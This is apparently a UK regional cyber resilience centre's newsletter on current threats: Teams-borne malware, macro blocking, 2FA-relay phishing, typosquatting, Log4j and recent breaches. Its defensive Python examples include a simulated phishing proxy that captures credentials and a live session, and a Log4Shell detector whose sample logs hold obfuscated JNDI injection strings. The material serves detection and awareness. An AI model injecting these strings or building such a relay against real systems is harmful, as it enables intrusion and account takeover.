The latest news from SWCRC

Welcome to this month’s updates and threat assessment. Like the headlines, this edition is significantly coloured by Russian activities in Ukraine, and the National Cyber Security Centre has been issuing communications about the need for UK businesses to review their cyber security and cyber resilience. This isn’t about small businesses becoming able to repel targeted attacks by a cyber power – it’s about the fact that we’re likely to see more ransomware, which can often be fairly indiscriminate in the way that it operates. 

This month, we also include a thought-provoking article from our trusted partner PGI, looking at supply chain security. Are you checking on the cyber credentials of businesses that you transact with, or do you just assume that the emails and documents they send you are safe? If they don't know where to start, we'll give them some free pointers – just point them in our direction. And you'll see a link for our first ever breakfast network. It's part of our effort to become more social, and in years to come, you'll be able to tell your grandkids "I was there". And on that basis, we'll look forward to seeing you on the day, to discover more about the intriguing world of the dark web.

Mark Moore, Director, SWCRC

Monthly threat assessment

As ever, your best defences are to do the simple things well: good passwords, two-factor authentication and backups to start with. If you want to review what you can do, either contact us or go back to the NCSC Small Business Guide, and of course you can consider the Cyber Essentials scheme, which walks you through how to get a lot safer and can come with free insurance too.

1) Attachments

You know that you should watch out for attachments in emails. In the arms race that is cyber criminality, you need to consider other attachments too. Specifically, there is an increase in malware circulating via Microsoft Teams, a medium that most of us trust. When an Office 365 account is compromised, the attacker can use Teams to send files to external organisations via messages, or to drop files into internal Teams chats, so as to spread throughout the network. A file that arrives this way carries the same trust as a colleague's message, so you and your people need to be aware of this as a new threat, which (see below) is only going to increase. See here for more details.

One of the reasons for the increase will likely be a change by Microsoft, which will ramp up the warnings issued to users who are invited to 'enable macros' when opening attachments. The change will start rolling out in early April, and will affect Microsoft Access, Excel, PowerPoint, Visio and Word on Windows devices. Macros were designed by Microsoft to automate common tasks in Office, but have often been used to deliver malware. So the change should make it harder for traditional malware channels to succeed, forcing criminals to become more creative. The update blocks macros by default in files that arrived from the internet (Office uses the 'mark of the web' that Windows attaches to downloads and email attachments to tell) and replaces the familiar one-click 'Enable Content' button with a warning and a link to guidance; it won't stop a determined user unblocking a file deliberately, but it does give a lot more information about the risks of doing so.
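For members who would rather catch macro-laden files before anyone is tempted to click 'enable', here is an added worked example. It is our own illustration, not Microsoft's code or any vendor's product, and the sample documents it builds are constructed stand-ins rather than real Word files. It relies on one fact about the format: modern Office files are ZIP containers, and an embedded VBA project is stored as a part called vbaProject.bin, so a file received over Teams or email can be inspected without opening it in Office.

```python
"""Check Office attachments for embedded VBA before anyone opens them.

Added example for this newsletter; it is not Microsoft's code or any vendor
tool. Office Open XML files (.docx, .xlsx, .pptx and the macro-enabled .docm,
.xlsm, .pptm) are ZIP containers, and a VBA project is stored as a part named
vbaProject.bin, so a file shared over Teams or email can be inspected without
launching Office. Legacy binary formats (.doc, .xls) are OLE2 compound files
and are only flagged here for separate analysis.
"""
import io
import zipfile

OLE2_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"
VBA_CONTENT_TYPE = "application/vnd.ms-office.vbaProject"
MACRO_EXTENSIONS = (".docm", ".dotm", ".xlsm", ".xltm", ".xlam", ".pptm", ".potm", ".ppam")


def inspect_office_file(name: str, data: bytes) -> dict:
    """Return {'name', 'format', 'has_macros', 'notes'} for one attachment."""
    verdict = {"name": name, "format": "unknown", "has_macros": False, "notes": []}
    if data.startswith(OLE2_MAGIC):
        verdict["format"] = "ole2"
        verdict["notes"].append("legacy binary Office format: analyse with olevba (oletools)")
        return verdict
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as container:
            parts = container.namelist()
            # A vbaProject.bin part means a VBA project is embedded, whatever the extension says.
            if any(p.lower().endswith("vbaproject.bin") for p in parts):
                verdict["has_macros"] = True
            # [Content_Types].xml declares each part's type; the VBA content type is a second signal.
            if "[Content_Types].xml" in parts:
                types_xml = container.read("[Content_Types].xml").decode("utf-8", "replace")
                if VBA_CONTENT_TYPE in types_xml:
                    verdict["has_macros"] = True
    except zipfile.BadZipFile:
        verdict["notes"].append("not an Office Open XML container")
        return verdict
    verdict["format"] = "ooxml"
    if verdict["has_macros"] and not name.lower().endswith(MACRO_EXTENSIONS):
        verdict["notes"].append("VBA project inside a non-macro extension: treat as suspicious")
    return verdict


def build_sample(with_macros: bool) -> bytes:
    """Constructed stand-in for a Word file (real ones carry more parts), built in memory."""
    overrides = ('<Override PartName="/word/document.xml" ContentType="application/'
                 'vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/>')
    if with_macros:
        overrides += f'<Override PartName="/word/vbaProject.bin" ContentType="{VBA_CONTENT_TYPE}"/>'
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", f'<?xml version="1.0"?><Types>{overrides}</Types>')
        z.writestr("word/document.xml", "<w:document/>")
        if with_macros:
            z.writestr("word/vbaProject.bin", b"\x00VBA-STUB\x00")  # placeholder, not real VBA
    return buf.getvalue()


def triage(attachments: dict) -> list:
    """Names of attachments to hold back for a closer look rather than deliver straight away."""
    held = []
    for name, data in attachments.items():
        v = inspect_office_file(name, data)
        if v["has_macros"] or v["format"] == "ole2":
            held.append(name)
    return held


if __name__ == "__main__":
    inbox = {"invoice.docm": build_sample(True), "invoice.docx": build_sample(True),
             "report.docx": build_sample(False), "old-report.doc": OLE2_MAGIC + b"\x00" * 16}
    for filename in inbox:
        print(inspect_office_file(filename, inbox[filename]))
    print("held back:", triage(inbox))
```

The second constructed file (a VBA project inside a .docx name) is the case worth noticing: Word will not run macros from a .docx, but the mismatch is a sign that someone has been tampering, and it is cheap to flag. Legacy .doc and .xls files are not ZIPs at all, which is why the check only labels them and leaves the real analysis to a tool such as olevba.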

2) Man-in-the-middle attacks

Also on the subject of fake emails and clicking in the wrong place: this article may be of interest to the more expert in our cyber community. For the rest of us, it shows how a scammer can bypass even two-factor authentication. The victim is sent to a look-alike login page that prompts for their password and one-time passcode, and the scammer's own computer records those details and passes them straight on to the real system, so the login succeeds for the scammer as well. It's called a man-in-the-middle attack. The limiting factor with this method is that it has to be highly targeted: I'd need to create a bespoke link for every individual that I want to compromise. But that might well be worth doing if I were trying to compromise a company owner, finance director or the like. The takeaway message is that whilst 2FA has always been and remains one of the most important things you can do to bolster your security, cybercriminals will always be working to find a way around it. Codes from an authenticator app or a text message can be relayed in this way; a hardware security key or passkey that is tied to the genuine website's address cannot, which is one reason to consider them for your most sensitive accounts. So stay vigilant about unexpected requests to log on to any system, particularly when they arise as a result of a link.
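For the more expert members, here is an added worked example of the attack in miniature. It is our own simulation, not code from the article above or from any real phishing kit: RealSite stands in for the genuine login server, PhishingProxy for the scammer's look-alike page, and the victim types the same password and code into whichever page they land on. The domains, account and secret are constructed for the demo; the TOTP routine follows RFC 6238 (HMAC-SHA1), which is what most authenticator apps implement. The final function goes one step beyond the article: it shows why an authenticator that signs the address it is actually talking to (the model behind hardware security keys and passkeys) is not fooled by the same relay.

```python
"""Model of the man-in-the-middle phishing described above.

Added example, not code from the newsletter or the article it links to. It is a
self-contained simulation: RealSite is the genuine login server, PhishingProxy is
the scammer's look-alike page, and the victim types the same password and
one-time code into whichever page they land on. The domains, secret and account
are constructed for the demo; the TOTP function follows RFC 6238 (HMAC-SHA1).
"""
import hashlib
import hmac
import struct
from typing import Optional


def totp(secret: bytes, at: float, step: int = 30, digits: int = 6) -> str:
    """RFC 6238 time-based one-time password."""
    counter = int(at // step)
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % (10 ** digits)).zfill(digits)


class RealSite:
    """The genuine service: checks password plus TOTP and hands out a session token."""
    ORIGIN = "https://login.example.com"  # constructed

    def __init__(self, password: str, totp_secret: bytes):
        self._password = password
        self._secret = totp_secret
        self._used_codes = set()
        self.sessions = {}

    def login(self, user: str, password: str, code: str, now: float) -> Optional[str]:
        if password != self._password:
            return None
        # Accept the current 30-second step and the previous one (normal clock-drift allowance).
        valid = {totp(self._secret, now), totp(self._secret, now - 30)}
        if code not in valid or code in self._used_codes:
            return None
        self._used_codes.add(code)  # one-time: the same code cannot be replayed later
        token = hashlib.sha256(f"{user}:{now}".encode()).hexdigest()[:16]
        self.sessions[token] = user
        return token


class PhishingProxy:
    """The scammer's look-alike page: records what the victim types and relays it at once."""
    ORIGIN = "https://login.example-support.com"  # constructed look-alike domain

    def __init__(self, real: RealSite):
        self._real = real
        self.captured = []

    def login(self, user: str, password: str, code: str, now: float) -> Optional[str]:
        record = {"user": user, "password": password, "otp": code}
        self.captured.append(record)
        token = self._real.login(user, password, code, now)  # relayed inside the code's validity window
        if token:
            record["session"] = token  # the scammer now holds a live session, not just a stale code
        return token  # the victim sees a normal successful login


def origin_bound_login(site_origin: str, browser_origin: str, challenge: bytes, key: bytes) -> bool:
    """Phishing-resistant MFA in miniature: the client signs the challenge together with
    the origin it is actually talking to, and the real site only accepts its own origin.
    A relay on a look-alike domain therefore produces a signature the real site rejects."""
    presented = hmac.new(key, challenge + browser_origin.encode(), hashlib.sha256).digest()
    expected = hmac.new(key, challenge + site_origin.encode(), hashlib.sha256).digest()
    return hmac.compare_digest(presented, expected)


def run_demo(now: float = 1_700_000_000.0) -> dict:
    """Walk the victim through the proxy and report what the scammer ends up with."""
    secret = b"constructed-demo-secret"
    password = "correct horse battery staple"
    real = RealSite(password, secret)
    proxy = PhishingProxy(real)
    code = totp(secret, now)  # the victim reads this from their authenticator app
    token = proxy.login("finance.director@example.com", password, code, now)
    replay = real.login("finance.director@example.com", password, code, now + 5)
    return {
        "victim_logged_in": token is not None,
        "scammer_holds_session": proxy.captured[0].get("session") == token and token in real.sessions,
        "replaying_same_code_later": replay is not None,
        "origin_bound_via_proxy": origin_bound_login(RealSite.ORIGIN, PhishingProxy.ORIGIN, b"challenge", secret),
        "origin_bound_direct": origin_bound_login(RealSite.ORIGIN, RealSite.ORIGIN, b"challenge", secret),
    }


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value}")
```

Two things are worth noticing. The one-time code is not broken and cannot be replayed five seconds later (the real site refuses it), yet the scammer still ends up holding a valid session, because the proxy used the code while it was fresh. And the origin-bound check fails through the proxy for a reason that has nothing to do with secrecy: the browser was talking to the look-alike domain, and that domain is part of what gets signed.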

3) Typosquatting

We're hearing increasing reports about so-called typosquatting attacks, where a spurious website, often on a domain that closely resembles a legitimate one, is created and manipulated towards the top of the search rankings. These websites are often used to offer free software which is actually malicious. This might be for things like a free video player, antivirus software or printing tools. There's a whole industry around this: you can actually create your own malware and then get it onto a site like this on a 'pay per click' basis, if you don't have the SEO skills to get to the Google front page by yourself! Our advice is to go via recognised app stores or the vendor's own site wherever you can, to check the address in the browser bar before you download anything, and if you have the ability, to restrict what users can download to company computers. Last month, the HP Threat Team identified a campaign in which a fake Windows 11 installer was used to distribute malware called RedLine Stealer, via a site that looked like a Windows upgrade downloader. An image appears below (don't visit it!). This malware can collect information from some web browsers, including logins, passwords, autofill data, cookies and personal submitted information such as credit card numbers.
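If you want to know whether someone has registered a look-alike of your own domain, the check below is an added worked example of how that is usually done; it is our illustration, not a tool from the HP report or from any vendor. It takes the registrable part of a legitimate domain (the brand 'examplebank' at examplebank.co.uk is constructed for the demo) and enumerates the usual typosquat transformations (dropped, doubled, swapped and replaced letters, hyphenation, look-alike characters), then checks a list of domains you have observed, for instance in DNS logs, certificate transparency feeds or your web proxy, against them, falling back to an edit-distance check for anything the enumeration missed. The suffix list is a deliberate simplification; a production tool should use the Public Suffix List.

```python
"""Spot look-alike domains for a brand you own or rely on.

Added example, not the newsletter's tooling. The brand, suffix and observed
domains are constructed for the demo; the suffix list is a simplification of
the Public Suffix List that a real tool should use.
"""
import string

# Characters attackers swap because they look alike in many fonts.
HOMOGLYPHS = {"o": "0", "l": "1", "i": "l", "m": "rn", "w": "vv", "d": "cl"}
ALPHABET = string.ascii_lowercase + string.digits + "-"
KNOWN_SUFFIXES = ("co.uk", "org.uk", "ac.uk", "gov.uk", "com", "net", "org", "uk")


def typo_variants(label: str) -> set:
    """Single-keystroke typos, hyphenation and homoglyph swaps of one DNS label."""
    n = len(label)
    out = set()
    for i in range(n):
        out.add(label[:i] + label[i + 1:])                                # omission
        out.add(label[:i] + label[i] + label[i:])                         # repetition
        if i < n - 1:
            out.add(label[:i] + label[i + 1] + label[i] + label[i + 2:])  # transposition
        if i > 0:
            out.add(label[:i] + "-" + label[i:])                          # hyphenation
        for c in ALPHABET:
            out.add(label[:i] + c + label[i + 1:])                        # replacement
    for i in range(n + 1):
        for c in ALPHABET:
            out.add(label[:i] + c + label[i:])                            # insertion
    for src, dst in HOMOGLYPHS.items():
        if src in label:
            out.add(label.replace(src, dst))                              # homoglyph
    out.discard(label)
    return {v.strip("-") for v in out if v.strip("-")}


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance with adjacent transpositions (optimal string alignment)."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)
    return d[len(a)][len(b)]


def registrable_label(domain: str) -> tuple:
    """Split 'www.examp1ebank.co.uk' into ('examp1ebank', 'co.uk')."""
    host = domain.lower().strip().rstrip(".")
    for sfx in sorted(KNOWN_SUFFIXES, key=len, reverse=True):
        if host.endswith("." + sfx):
            return host[: -len(sfx) - 1].split(".")[-1], sfx
    parts = host.split(".")
    return (parts[-2] if len(parts) > 1 else parts[0]), parts[-1]


def classify(observed: str, brand: str, brand_suffix: str, max_distance: int = 2) -> dict:
    """Explain why an observed domain does or does not look like the brand."""
    label, sfx = registrable_label(observed)
    if label == brand and sfx == brand_suffix:
        reason = "legitimate"
    elif label == brand:
        reason = "tld-swap"
    elif label in typo_variants(brand):
        reason = "typo-variant"
    elif brand in label:
        reason = "brand-embedded"
    else:
        dist = edit_distance(label, brand)
        reason = f"edit-distance-{dist}" if dist <= max_distance else "unrelated"
    return {"domain": observed, "label": label, "suffix": sfx, "reason": reason}


def suspicious(observed_domains, brand: str, brand_suffix: str) -> list:
    """Everything that is neither the real domain nor unrelated, for a human to review."""
    verdicts = (classify(d, brand, brand_suffix) for d in observed_domains)
    return [v for v in verdicts if v["reason"] not in ("legitimate", "unrelated")]


# Constructed sample of domains seen in DNS/proxy logs, not real observations.
OBSERVED = ["www.examplebank.co.uk", "examplebank.com", "examp1ebank.co.uk",
            "exampelbank.co.uk", "examplebank-login.net", "example-bank.co.uk",
            "exarnplebank.co.uk", "examplebnk.co.uk", "bbc.co.uk"]

if __name__ == "__main__":
    for v in suspicious(OBSERVED, "examplebank", "co.uk"):
        print(f"{v['domain']:28} {v['reason']}")
```

The reason string is there so that whoever reviews the output can prioritise: a brand embedded in a longer name ("examplebank-login") and a homoglyph swap ("exarnplebank") are the ones most often used for credential phishing, while a plain TLD swap may be a squatter waiting to sell the name back to you.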


4) Threat actors

Also of interest this month was a report from BT intelligence services that there is a rise in the number of threat actors seeking collaborators on the inside of companies. Some are willing to pay more than £10,000 for access to sensitive networks. Others are taking advantage of vulnerable employees, preying on them via dating platforms before coercing them. As cyber security gets better, insiders are a good way to bypass your protective measures. So our advice is to always ensure that your people can access only the information that they need, and make sure they know that they have ways to report concerns to you safely.

5) VirusTotal and Log4j updates

Lastly, before we come to this month's breaches of interest, a couple of items of interest for our more expert members. VirusTotal scans submitted files against dozens of antivirus engines, but it also lets community members vote on and comment about a file's safety, and some recent work by the team behind @malwrhunterteam has called that community side into question. Essentially, they were able to make malware look safe by providing a string of positive community votes, and there is minimal checking on the veracity of users, who may give themselves reputable-sounding titles. Worth being aware of, and exercising caution: treat the community score as an opinion rather than a verdict, and look at the engine detections. And in the world of Log4j, security company Morphisec has identified threat actors using a customised public exploit for the Log4j vulnerability to take over Ubiquiti network appliances running the UniFi software. Although a patch was released quickly, the assessment is that a number of Ubiquiti customers have yet to apply it. If this is you, or someone that you know, get updating.
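For those running anything that logs what visitors send it, here is an added worked example of how to find Log4j exploitation attempts in your logs. It is our own illustration, not Morphisec's code and not the exploit they describe. The attack starts with a string such as ${jndi:ldap://attacker/x} arriving in any field the application logs, and attackers hide it behind nested Log4j lookups (${lower:j}, ${::-j}, ${env:X:-j}) and URL encoding, so a plain search for "jndi" misses a lot. The normaliser below collapses those lookups inside-out, in the way Log4j itself would, before testing for a JNDI lookup. The log lines are constructed for the demo, not from a real server.

```python
"""Find Log4Shell probes in web-server logs, including the obfuscated forms.

Added example for our more expert members; it is not Morphisec's code and not
an exploit. The log lines below are constructed for the demo.
"""
import re
import urllib.parse

LOOKUP = re.compile(r"\$\{([^${}]*)\}")   # innermost ${...} with no further nesting inside
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nds|http)\s*:", re.IGNORECASE)


def _resolve(match) -> str:
    """Evaluate one innermost lookup the way Log4j 2.x would."""
    body = match.group(1)
    if body.lstrip().lower().startswith("jndi:"):
        return match.group(0)               # leave the JNDI lookup in place so it can be matched
    if ":-" in body:
        return body.split(":-", 1)[1]       # ${anything:-default} evaluates to the default
    key, _, value = body.partition(":")
    if key.lower() == "lower":
        return value.lower()
    if key.lower() == "upper":
        return value.upper()
    return value                             # other lookups: keep the argument text (heuristic)


def normalise(text: str, max_rounds: int = 64) -> str:
    """URL-decode, then resolve nested lookups inside-out until nothing changes."""
    text = urllib.parse.unquote(text)
    for _ in range(max_rounds):              # bounded, so a hostile line cannot loop forever
        new = LOOKUP.sub(_resolve, text)
        if new == text:
            break
        text = new
    return text


def detect(line: str):
    """Return the JNDI scheme found in a log line, or None if it looks clean."""
    m = JNDI.search(normalise(line))
    return m.group(1).lower() if m else None


def scan(lines):
    """Pair each line with its verdict; use this to sweep a whole log file."""
    return [(line, detect(line)) for line in lines]


# Constructed access-log lines (not from a real server). The payloads sit in the
# User-Agent or the request path, two fields almost every application logs.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Feb/2022:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Feb/2022:10:01:03 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://203.0.113.9:1389/a}"',
    '203.0.113.7 - - [10/Feb/2022:10:01:04 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${lower:j}ndi:${lower:rmi}://203.0.113.9/b}"',
    '203.0.113.7 - - [10/Feb/2022:10:01:05 +0000] "GET /?x=${${::-j}${::-n}${::-d}${::-i}:'
    '${::-l}${::-d}${::-a}${::-p}://203.0.113.9/c} HTTP/1.1" 404 0 "-" "curl/7.79"',
    '203.0.113.7 - - [10/Feb/2022:10:01:06 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"%24%7B%24%7Benv%3ANaN%3A-j%7Dndi%3Adns%3A%2F%2F203.0.113.9%2Fd%7D"',
    '203.0.113.7 - - [10/Feb/2022:10:01:07 +0000] "GET /docs/${version} HTTP/1.1" 200 100 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for line, verdict in scan(SAMPLE_LOG):
        print(f"{verdict or '-':6} {line[:90]}")
```

A hit in a log does not mean the device was exploited, only that it was probed; a vulnerable UniFi controller would then make an outbound LDAP, RMI or DNS connection to the address in the payload, which is the thing to look for in firewall logs. Either way, the fix is the one in the paragraph above: apply the patch.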

6) Breaches

In this month's breaches, there are several that might affect you. Your basic minimum response, if you are not already aware, is to change your password on that site and on any others where you have reused it; to implement two-factor authentication where the facility exists; and to be aware that future contacts claiming to come from the company ought to be thoroughly checked out, rather than taken at face value. It's worth following these reports up directly with the company if you're involved and they've not already contacted you.

*  Parasol, a company that provides PAYE payroll services for around 28,000 contractors via its parent company Optionis, has suffered a breach whose extent is not yet entirely clear. More detail here if you're worried and think that you might be affected, but it looks likely that a host of information could be involved, from personal details and bank details through to more comprehensive company accounting details.

*  A company called Onfido, which provides identity-verification services that other businesses use to collect customers' documents, has been subject to a security failure. Onfido say that this is about the improper deployment of their tool, but as a result Europcar, Chip (a UK saving app) and FxPro Direct have had user data leaked. It is thought to include passport details, driving licences and ID cards.

*  Element Vape, a vaping site (surprisingly), has found an active credit card skimmer on its site. If you're a customer, stay alert for suspicious transactions, and if in doubt, contact your bank.

*  The British Council have suffered a breach which includes personal data for almost 150,000 students. Detail includes names, usernames, email addresses, and study notes. 

*  And lastly, the Internet Society (ISOC) has identified a breach of membership details affecting thousands of people. Data exposed includes full names, addresses, gender, login details and password hashes. 


Supply chain: Is your security entirely in your hands?

You can never be 100% certain that your suppliers have a strong security posture—more often than not, you can only take them at their word. But there are ways to minimise the risk.

What does a supply chain threat look like?

Let's look at NotPetya. The origin of the biggest global cyberattack to date was the widely used Ukrainian accounting software M.E.Doc. The developers of that software had poor cyber security measures in place, which enabled Russian state actors to compromise their update servers: once a user updated their software, they were infected too. This attack resulted in losses of millions for businesses globally, including the world's largest shipping company, Maersk. The seemingly simple installation of M.E.Doc software on one computer at Maersk's office in Odessa caused a company-wide outage.

The key point here is that M.E.Doc was a trusted supplier for most businesses in Ukraine because the software was used to interact with Ukrainian tax systems. When we trust a supplier, we often don't question what security measures they have in place, sometimes to our own detriment.

Addressing supply chain security

Regardless of whether IT or procurement (or some other department) is responsible for supply chain security, what matters is a consistent approach. So, how do you consistently assess the level of risk each supplier brings? Much will depend upon criticality. If your payment portal is hacked, that's a major operational disruption that could cause loss of income and reputational damage. But if your external recruitment company is hit and you need to engage a new recruitment firm, it's an inconvenience but won't cripple your business.

At a basic level, the process of assessing the level of risk should include considering:

  • The criticality of the supplier (i.e., do your core operations depend upon this supplier?)
  • Their access (e.g., are you sharing data with the supplier? Do they have access to your systems?)

Once you have established the supplier risk levels, you will need to:

  • Define your own security requirements (i.e., what assurance do you want from high, medium and low risk suppliers?)
  • Determine how the supplier can best demonstrate compliance with your requirements (e.g., onsite security audits, completion of a security questionnaire, proof of Cyber Essentials certification)

What happens if something goes wrong?

You've put in place your own controls, and criteria for your suppliers, but what happens if something goes wrong and your supplier is breached, resulting in your organisation being compromised? You'll need a comprehensive incident response plan, which gives you the framework to minimise damage and get the business operating again, and you'll need to check that your cyber insurance policy covers damage caused by a supplier compromise.

How PGI can help secure your supply chain

PGI offers a range of services to help you gain a deeper understanding and more control over your supply chain management, including creating and implementing risk assessment processes, creating supplier assurance policies and procedures (such as security-related contract clauses, and due diligence questionnaires), and carrying out onsite supply chain audits.

If you’re ready to take more control of your supply chain, talk to us: Call on +44 (0) 845 600 4403 or email via

Cyber Beat Podcast

Ross Brown this week talks to Keith Buzzard, CTO of Protection Group International, about the different types of cyber attack. With the current situation developing between Russia and Ukraine, and the heightened threat of cyber attacks as a result, this podcast has never been more relevant. Keith gives practical advice on the attacks themselves, how to mitigate them and, most importantly, staff awareness.

You can find the podcasts on Spotify or Google Podcasts. Click the image to go to Google Podcasts.

Dates for your diary

March 23rd - Secure South West

Keynote Speaker Erika Lewis, DCMS Director of Cyber Security and Digital Identity 

March 31st, 0815 - 0845 - Cereal and Cyber

Our first webinar for SWCRC members (and guests) focusing on ethical hacking.

In line with the National Cyber Security Centre's recent warning following the situation in Ukraine, the South West Regional Cyber Crime Unit are urging organisations to be extra vigilant with regards to online security. 

While we are not aware of any current specific threats to the UK in relation to recent events, there has been an historical pattern of cyber attacks on Ukraine with international consequences. 

The guidance linked to in the NCSC alert includes 11 actions to take to strengthen your organisation's resilience. Please follow these steps to reduce the risk of falling victim to an attack.